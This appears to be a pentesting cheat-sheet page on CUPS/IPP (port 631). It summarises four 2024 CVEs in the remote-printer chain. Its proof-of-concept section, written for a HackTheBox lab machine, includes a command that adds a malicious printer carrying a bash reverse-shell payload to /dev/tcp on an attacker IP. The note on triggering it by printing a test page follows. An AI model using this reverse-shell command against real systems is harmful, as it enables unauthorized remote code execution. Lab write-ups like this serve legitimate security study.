IPP

Internet Printing Protocol

CUPS (Common UNIX Printing System)

  • It uses UDP and TCP on Port 631

Vulnerabilities

CVE-2024-47176

  • cups-browsed, the service that typically listens on all interfaces UDP 631, is what allows adding a printer to a machine remotely. This vulnerability allows any attacker who can reach this machine to trigger a “Get-Printer-Attributes” IPP request being sent to an attacker-controlled URL.

CVE-2024-47076

  • libcupsfilters is responsible for handling the IPP attributes returned from the request. These are written to a temporary Postscript Printer Description (PPD) file without sanitization, allowing malicious attributes to be written.

CVE-2024-47175

  • libppd is responsible for reading a temporary PPD file and turning that into a printer object on the system. It also doesn’t sanitize when reading, allowing for injection of attacker controlled data.

CVE-2024-47177

  • This vulnerability in cups-filters allows for loading a printer using the foomatic-rip print filter, which is a universal converter for transforming PostScript or PDF data into the format that the printer can understand. It has long had issues with command injection, and has been limited to manual installs / configurations only.

POC

  • Ippsec has a POC that is used on the evilcups machine from HackThebox:

Add the malicious printer
python evil-cups.py 10.10.14.6 10.10.11.40 'nohup bash -c "bash -i >& /dev/tcp/10.10.14.6/443 0>&1"&'

  • Now, on the server select the the malicious printer and trigger the option Print Test Page

  • The default path for printed jobs is /var/spool/cups

PreviousNFSNextWinRM

Last updated